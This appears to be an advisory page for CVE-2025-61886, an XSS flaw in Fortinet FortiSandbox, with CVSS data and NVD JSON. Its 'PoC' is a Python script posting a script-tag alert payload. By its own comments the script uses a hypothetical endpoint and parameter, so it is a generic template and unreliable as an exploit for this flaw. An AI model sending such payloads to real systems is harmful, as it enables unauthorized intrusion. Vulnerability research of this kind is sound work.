Security Vulnerability Report
中文
CVE-2025-61886 CVSS 5.4 MEDIUM

CVE-2025-61886

Published: 2026-04-14 16:16:32
Last Modified: 2026-04-22 19:09:05
Source: [email protected]

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiSandbox 5.0.0 - 5.0.4
Fortinet FortiSandbox PaaS 5.0.0 - 5.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) # Replace with the actual vulnerable endpoint target_url = "http://target-fortisandbox/vulnerable_endpoint" # Malicious XSS Payload # This payload attempts to execute JavaScript to show an alert box payload = '<script>alert("CVE-2025-61886 XSS Test")</script>' # Headers to mimic a legitimate browser request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } # Data to be sent in the request # The parameter name 'vulnerable_param' is hypothetical and needs to be fuzzed or found in documentation data = { "vulnerable_param": payload } try: # Sending the crafted HTTP request response = requests.post(target_url, data=data, headers=headers, timeout=10) # Check if the request was successful if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the target application page or response to verify XSS execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61886", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.800", "lastModified": "2026-04-22T19:09:04.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.5", "matchCriteriaId": "EF408E96-79E8-452F-87E5-2E8CA083785E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "E5E86B19-95E8-4107-85DC-EFE47225418C"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-109", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.